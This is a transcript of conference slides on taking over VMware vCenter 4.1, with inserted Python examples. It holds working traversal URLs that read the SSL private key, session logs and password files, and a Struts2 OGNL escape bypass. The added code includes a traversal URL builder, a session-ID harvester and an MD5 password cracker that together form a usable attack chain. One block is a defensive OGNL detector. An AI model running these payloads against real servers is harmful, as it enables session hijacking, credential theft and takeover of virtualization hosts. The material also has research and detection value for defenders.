How to hack VMware vCenter server in 60 seconds

Published in: Technology
Transcript of "How to hack VMware vCenter server in 60 seconds"

  1. How to hack VMware vCenter server in 60 seconds. Alexey Sintsov, Alexander Minozhenko

  2. Hijacking VMware. @asintsov @al3xmin
     • Pen-testers at Digital Security
     • Researchers
     • DCG#7812 / ZeroNights
     • FUN, FUN, FUN
     © 2002—2012, Digital

  3. Our target

  4. VMware vCenter Server
     • VMware vCenter Server is the solution for managing VMware vSphere
     • vSphere – virtualization operating system

  5. Pen-test…
     • VMware vCenter version 4.1 update 1
     Services:
     • Update Manager
     • vCenter Orchestrator
     • Chargeback
     • Other
     • Most of those services have their own web server

  6. VASTO and CVE-2009-1523
     • Directory traversal in the Jetty web server:
       http://target:9084/vci/download/health.xml/%3f/../../../../FILE
     • Discovered by Claudio Criscione
     • Fixed in VMware Update Manager 4.1 update 1 :(
     • Who wants to pay me for a 0day?
     • Is a pentester not a researcher?

  7. 8(

  8. CVE-2010-1870
     • VMware vCenter Orchestrator uses Struts2 version 2.11 (discovered by Digital Defense, Inc.)
     • CVE-2010-1870: Struts2/XWork remote command execution, discovered by Meder Kydyraliev
     • Fixed in 4.2

  9. Details
     • Struts2 does not properly escape “#”
     • Can be bypassed with the unicode escape “\u0023”
     • 2 variables need to be set for RCE:
     • #_memberAccess[allowStaticMethodAccess]
     • #context[xwork.MethodAccessor.denyMethodExecution]
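Added example, not from the slides: a small detector for the bypass slide 9 describes. Struts2 rejected a literal "#" in parameter names, but an OGNL unicode escape (\u0023), optionally URL-encoded again (%5Cu0023), slipped past the check. The function below peels both encodings until the string stops changing and then looks for the two OGNL variables the slide names. The request strings in SAMPLE_PARAMS are constructed for the example.

```python
import re
from urllib.parse import unquote

# The two OGNL variables named on slide 9, plus the leading "#" form of the first.
OGNL_MARKERS = (
    "#_memberAccess",
    "allowStaticMethodAccess",
    "xwork.MethodAccessor.denyMethodExecution",
)

# Java/OGNL unicode escape: \u0023 -> "#", \u003d -> "=", ...
_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")


def normalize(value, max_rounds=3):
    """Peel URL-encoding and \\uXXXX escapes until the string stops changing.

    A single decode step is what the vulnerable filter effectively did, so an
    attacker could send \\u0023 (or %5Cu0023) instead of "#".  Repeating both
    decodes a bounded number of times catches nested encodings without looping.
    """
    current = value
    for _ in range(max_rounds):
        decoded = unquote(current)
        decoded = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        if decoded == current:
            break
        current = decoded
    return current


def ognl_markers(raw_param):
    """Return the CVE-2010-1870 markers present after normalisation, in fixed order."""
    norm = normalize(raw_param)
    return [marker for marker in OGNL_MARKERS if marker in norm]


def is_struts_ognl_probe(raw_param):
    return bool(ognl_markers(raw_param))


# Constructed sample parameter strings, as they might appear in an access log.
SAMPLE_PARAMS = [
    "vmname=web01&action=start",                                            # benign
    "('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true",    # "#" as \u0023
    "%5Cu0023context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D",  # backslash URL-encoded too
]


def scan(params):
    """Pair each raw parameter string with the markers found in it."""
    return [(p, ognl_markers(p)) for p in params]


if __name__ == "__main__":
    for raw, hits in scan(SAMPLE_PARAMS):
        print("SUSPECT" if hits else "ok     ", raw, hits)
```

Matching on the normalised string rather than on the raw bytes is the whole point: a signature for the literal "#_memberAccess" never fires on the escaped form, which is exactly the traffic this CVE produces.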
  10. But what about us?
     • Directory traversal in the Jetty web server … AGAIN!
       http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..FILE.EXT
     • Metasploit module vmware_update_manager_traversal.rb by sinn3r
     • We can read any file! But what Claudio Criscione proposed to read… sorry, patched in 4.1!
     • vpxd-profiler-* contains logs of SOAP requests with session IDs!!! Discovered by Alexey Sintsov 8)
       /SessionStats/SessionPool/Session/Id=06B90BCB-A0A4-4B9C-B680-FB72656A1DCB/Username='FakeDomain\FakeUser'/SoapSession/Id=AD45B176-63F3-4421-BBF0-FE1603E543F4/Count/total 1

  11. Attack #1
     • Read vpxd-profiler via traversal…
     • Get the admins' IP addresses from it…
     • Read the secret SSL key:
       http://target:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
     • ARP-spoof with the SSL key – PROFIT
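Added example, not code from the talk: the traversal request of slides 10 and 11 as a URL builder, plus a parser that pulls the session ID, username and SOAP session ID out of vpxd-profiler lines of the shape slide 10 shows. The hop count, the file path and the profiler lines in SAMPLE_PROFILER are constructed; the depth a real host needs depends on where the Jetty document root sits, and the module named on the slide is not reproduced here.

```python
import re
from urllib.parse import quote

VUM_PORT = 9084  # Update Manager's Jetty listener, as on the slides


def traversal_url(host, target_path, depth=8, port=VUM_PORT):
    """Build the backslash traversal from slide 10: .\\..\\..\\...\\<path> under /vci/download/.

    target_path is a Windows-style path (backslashes) below the drive root; every
    backslash and space is percent-encoded, so backslashes go out as %5C like the
    slide's payload.
    """
    hops = ".%5C" + "..%5C" * depth
    return "http://%s:%d/vci/download/%s%s" % (host, port, hops, quote(target_path, safe=""))


# One record per SOAP session, layout taken from the slide 10 profiler line:
# /SessionStats/SessionPool/Session/Id=<GUID>/Username='<DOMAIN\user>'/SoapSession/Id=<GUID>/...
_PROFILER_LINE = re.compile(
    r"/SessionStats/SessionPool/Session/Id=(?P<session>[0-9A-Fa-f-]{36})"
    r"/Username='(?P<user>[^']+)'"
    r"/SoapSession/Id=(?P<soap>[0-9A-Fa-f-]{36})"
)


def harvest_sessions(profiler_text):
    """Return unique (session_id, username, soap_session_id) tuples in order of appearance."""
    found = []
    for line in profiler_text.splitlines():
        m = _PROFILER_LINE.search(line)
        if m and m.groups() not in found:
            found.append(m.groups())
    return found


# Constructed profiler excerpt: one repeated line, two other users' sessions, one unrelated counter.
SAMPLE_PROFILER = """\
/SessionStats/SessionPool/Session/Id=06B90BCB-A0A4-4B9C-B680-FB72656A1DCB/Username='FakeDomain\\FakeUser'/SoapSession/Id=AD45B176-63F3-4421-BBF0-FE1603E543F4/Count/total 1
/SessionStats/SessionPool/Session/Id=06B90BCB-A0A4-4B9C-B680-FB72656A1DCB/Username='FakeDomain\\FakeUser'/SoapSession/Id=AD45B176-63F3-4421-BBF0-FE1603E543F4/Count/total 1
/SessionStats/SessionPool/Session/Id=1D2E3F40-0000-4000-8000-ABCDEF012345/Username='FakeDomain\\svc_backup'/SoapSession/Id=9A8B7C6D-1111-4222-8333-444455556666/Count/total 7
/SessionStats/SessionPool/Session/Id=2A2B2C2D-3E3F-4041-8243-444546474849/Username='FakeDomain\\FakeUser'/SoapSession/Id=5F6E7D8C-9B0A-4112-8334-556677889900/Count/total 1
/Vpxd/SomeOtherCounter/total 42
"""

if __name__ == "__main__":
    key_path = "Documents and Settings\\All Users\\Application Data\\VMware\\VMware VirtualCenter\\SSL\\rui.key"
    print(traversal_url("target", key_path, depth=7))
    for session_id, user, soap_id in harvest_sessions(SAMPLE_PROFILER):
        print(user, session_id, soap_id)
```

Deduplicating on the whole tuple matters because the profiler keeps a running count per session, so the same line recurs on every poll; the usernames that fall out are the accounts worth targeting in the next step.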
  12. VMware vCenter Orchestrator
     • VMware vCO – software for automating configuration and management
     • Installed by default with vCenter
     • Has an interesting file:
       C:\Program Files\VMware\Infrastructure\Orchestrator\configuration\jetty\etc\passwd.properties

  13. VMware vCenter Orchestrator – password disclosure
     Read hash -> crack MD5 -> log on to Orchestrator -> get vCenter pass
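Added example, not code from the talk: the "read hash -> crack MD5" step of slide 13, written against a constructed passwd.properties. The file is assumed to be in Jetty's HashLoginService layout (user: MD5:<hex>,role,...); that layout is an assumption about vCO's copy, not something the slides state. The two crackable hashes are MD5 of "admin" and "password"; the wordlist is a handful of constructed entries.

```python
import hashlib

# Constructed sample in Jetty HashLoginService format (assumed for vCO's passwd.properties):
# "username: MD5:<hex md5 of password>,role1,role2"
SAMPLE_PASSWD_PROPERTIES = """\
# vCO Jetty realm (constructed for this example)
vmware: MD5:21232f297a57a5a743894a0e4a801fc3,user
orchestrator: MD5:5f4dcc3b5aa765d61d8327deb882cf99,admin
svc_backup: MD5:ffffffffffffffffffffffffffffffff,user
"""

# Constructed wordlist; a real run points this at a dictionary file.
WORDLIST = ["vmware", "vcenter", "admin", "Passw0rd", "password", "orchestrator"]


def parse_passwd_properties(text):
    """Return (username, md5_hex) for each MD5: entry; skip comments and other credential types."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, cred = line.split(":", 1)
        cred = cred.strip().split(",", 1)[0]  # drop the role list
        if cred.upper().startswith("MD5:"):
            entries.append((user.strip(), cred[4:].lower()))
    return entries


def crack_md5(md5_hex, wordlist):
    """Plain dictionary attack: unsalted MD5 means one digest per candidate, no per-user work."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == md5_hex:
            return candidate
    return None


def crack_all(text, wordlist):
    """Map every MD5: user in the file to its recovered password, or None if not in the wordlist."""
    return {user: crack_md5(digest, wordlist) for user, digest in parse_passwd_properties(text)}


if __name__ == "__main__":
    for user, password in crack_all(SAMPLE_PASSWD_PROPERTIES, WORDLIST).items():
        print(user, "->", password if password else "(not cracked)")
```

The parser ignores Jetty's CRYPT: and OBF: entry types; only the unsalted MD5 form the slide mentions is handled, and its lack of a salt is what makes a dictionary pass this cheap.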
  14. VMware vCenter Orchestrator – more stuff
     • vCO stores passwords in files:
       C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\plugins\VC.xml
       C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\vmo.properties
     • VC.xml:
       <virtual-infrastructure-host>
         <enabled>true</enabled>
         <url>https://new-virtual-center-host:443/sdk</url>
         <administrator-username>vmware</administrator-username>
         <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
         <pattern>%u</pattern>
       </virtual-infrastructure-host>

  15. Hmmm….
     006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b   vmware
     00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079   vcenter
     • Red bytes look like a length
     • Green bytes are in the ASCII range
     • Black bytes look random
     (the slide's colour highlighting is not preserved in this transcript)
     Discovered by Alexey Sintsov and Alexander Minozhenko

  16. 0day, still not patched 8)

  17. gg and bb
     a.sintsov@dsec.ru @asintsov
     a.minozhenko@dsec.ru @al3xmin